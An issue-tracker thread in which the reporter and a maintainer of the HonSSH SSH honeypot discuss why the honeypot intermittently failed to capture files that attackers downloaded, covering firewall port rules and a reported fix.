File download working intermittently
Closed this issue · 10 comments
What steps will reproduce the problem?
1. The attacker logs in and downloads a file.
What is the expected behavior?
All files that's downloaded to the honeypot are also downloaded by HonSSH
What do you see instead?
Only some files are downloaded, others are not.
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4
Please provide any additional information below.
This is the first time i've noticed this. Two files were downloaded to the
honeypot today, the only difference i can see between the two download events
is the port the attacker connects to on the malware hosting server.
HTTP on port 6666 in this case. If this is the case its not consistent either
as HonSSH has managed to do this before.
Adding log, adv-log and tty. Enjoy! :)
Original issue reported on code.google.com by are.hans...@gmail.com
on 26 Mar 2014 at 10:32
Attachments:
Original comment by tnn...@googlemail.com
on 26 Mar 2014 at 10:36
- Changed state: Accepted
Bit worried about your .log file being so empty!
Original comment by tnn...@googlemail.com
on 26 Mar 2014 at 10:43
yepp, that is a bit concerning
Original comment by are.hans...@gmail.com
on 26 Mar 2014 at 10:44
Just looking into this and got a bit confused.
So the attacker downloads two files and honssh did not download any?
Original comment by tnn...@googlemail.com
on 30 Mar 2014 at 1:44
As i recall the attacker downloaded two files, but HonSSH did not intercept any
of them in this instance. It was able to intercept another file earlier the
same day.
Dont have access to the machine atm, ill dig out some more info for you if you
like.
Original comment by are.hans...@gmail.com
on 30 Mar 2014 at 1:50
Hmmm ok I understand :D
I just pasted the command into my test setup and it seems to catch and download
it correctly.
Any chance the firewall on the HonSSH box blocked port 6666 outbound (even when
locally generated)?
Original comment by tnn...@googlemail.com
on 30 Mar 2014 at 1:56
Hmmm....it's allowing tcp/6660-6669 from the honeynet.
It shouldn't block HonSSH from fetching files on the external interface, if
that was the case I wouldn't see any downloads at all I think.
Sent from my Nokia 3310.
Original comment by are.hans...@gmail.com
on 30 Mar 2014 at 2:02
Ah yeah, that's true. I'll keep thinking.
Original comment by tnn...@googlemail.com
on 30 Mar 2014 at 2:04
Original comment by tnn...@googlemail.com
on 5 Apr 2014 at 4:37
- Changed state: Started
Hopefully it will catch all now. Raise another issue if not :)
Original comment by tnn...@googlemail.com
on 6 Apr 2014 at 2:40
- Changed state: Fixed